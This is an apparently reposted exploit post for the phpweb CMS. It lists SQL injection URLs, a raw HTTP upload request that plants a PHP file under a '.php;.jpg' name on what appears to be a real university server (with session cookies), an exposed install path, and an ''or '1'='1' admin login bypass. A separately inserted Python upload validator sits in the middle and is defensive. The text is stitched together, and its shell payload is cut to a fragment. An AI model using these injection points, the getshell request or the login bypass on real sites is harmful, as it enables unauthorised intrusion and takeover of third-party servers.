
phpweb: SQL injection + upload + install file vulnerability + universal password (with fixes)

2014-03-15 05:02 Views: 38201


# Author: lostowlf home: hi.baidu.com/nginxshell
Test:
******sqlinjection*******
http://www.phpweb.net/down/class/index.php?myord=1{sqlinjection}
http://www.phpweb.net/photo/clas … mp;key=&myord=1 {sqlinjection}
***********getshell********
POST /kedit/upload_cgi/upload.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Referer: http://phpweb.net/news/admin/new … p;pid=all&page=
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7db516c0118
UA-CPU: x86
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Host: lib.jlnu.edu.cn
Proxy-Connection: Keep-Alive
Cookie: CODEIMG=6878; SYSZC=c7646d833635a773e6a89e364d9f0eca; SYSUSER=wlf; SYSNAME=%E7%8E%8B%E7%AB%8B%E5%B3%B0; SYSUSERID=15; SYSTM=1318373657
Content-Length: 6620

-----------------------------7db516c0118
Content-Disposition: form-data; name="fileName"

201110121318373662005.php;.jpg
-----------------------------7db516c0118
Content-Disposition: form-data; name="attachPath"

news/pics/
-----------------------------7db516c0118
Content-Disposition: form-data; name="fileData"; filename="C:\6.gif"
Content-Type: image/gif

gif89a
');?>
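A server-side check for the three form fields used in the upload request above (fileName, attachPath, fileData), added here as an example; it is not phpweb's code and not part of the original post. The extension lists, the allowed directory and the sample body are assumptions constructed for illustration.

```python
import re

# Assumed policy for this example: extensions the server could execute,
# plus allow lists for image types and upload directories.
EXEC_EXT = {"php", "php3", "php5", "phtml", "asp", "aspx", "asa", "cer", "cgi"}
ALLOWED_EXT = {"jpg", "jpeg", "gif", "png"}
ALLOWED_PATHS = {"news/pics/"}

def parse_fields(boundary: str, body: bytes) -> dict:
    """Split a multipart/form-data body into {field name: raw value}."""
    fields = {}
    for part in body.split(b"--" + boundary.encode())[1:]:
        if part.startswith(b"--"):  # closing delimiter
            break
        head, _, data = part.partition(b"\r\n\r\n")
        m = re.search(rb'\bname="([^"]*)"', head)
        if m:
            fields[m.group(1).decode()] = data[:-2] if data.endswith(b"\r\n") else data
    return fields

def check_upload(fields: dict) -> list:
    """Return the reasons to reject the upload (empty list means accept)."""
    name = fields.get("fileName", b"").decode("latin-1")
    path = fields.get("attachPath", b"").decode("latin-1")
    findings = []
    if re.search(r"[;:/\\\x00]", name):
        findings.append("fileName contains a separator character")
    exts = [e.lower() for e in re.split(r"[.;]", name)[1:]]
    if any(e in EXEC_EXT for e in exts):
        findings.append("executable extension inside fileName")
    if not exts or exts[-1] not in ALLOWED_EXT:
        findings.append("final extension is not an allowed image type")
    if path not in ALLOWED_PATHS:
        findings.append("attachPath is not an allowed directory")
    return findings

# Constructed sample with the same field layout as the request above.
BOUNDARY = "example-boundary"
SAMPLE = (
    b'--example-boundary\r\nContent-Disposition: form-data; name="fileName"\r\n\r\n'
    b'201110121318373662005.php;.jpg\r\n'
    b'--example-boundary\r\nContent-Disposition: form-data; name="attachPath"\r\n\r\n'
    b'news/pics/\r\n'
    b'--example-boundary\r\nContent-Disposition: form-data; name="fileData"; '
    b'filename="6.gif"\r\nContent-Type: image/gif\r\n\r\nGIF89a\r\n'
    b'--example-boundary--\r\n'
)

if __name__ == "__main__":
    print(check_upload(parse_fields(BOUNDARY, SAMPLE)))
```

Generating the stored file name on the server instead of accepting fileName and attachPath from the client removes the need for most of these checks.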
*********install file:**********
http://www.exehack.net /base/install/
*********admin********
www.exehack.net /admin.php
username: admin 'or '1'='1
username: admin 'or '1'='1